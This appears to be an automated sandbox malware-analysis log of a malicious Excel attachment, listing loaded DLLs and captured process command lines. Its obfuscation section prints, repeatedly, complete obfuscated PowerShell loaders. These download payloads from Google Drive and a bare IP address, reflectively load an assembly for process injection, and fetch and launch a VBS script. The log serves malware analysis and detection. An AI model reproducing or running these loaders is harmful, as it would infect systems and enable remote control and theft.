      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: A & C Metrology OC 5457144.xlsStatic file information: File size 1081344 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdb source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdbhP source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdbhP source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdb source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
      Source: 54330000.0.drInitial sample: OLE indicators vbamacros = False
      Source: A & C Metrology OC 5457144.xlsInitial sample: OLE indicators encrypted = True

      Data Obfuscation

      barindex
      Obfuscated command line found
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      PowerShell case anomaly found
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZ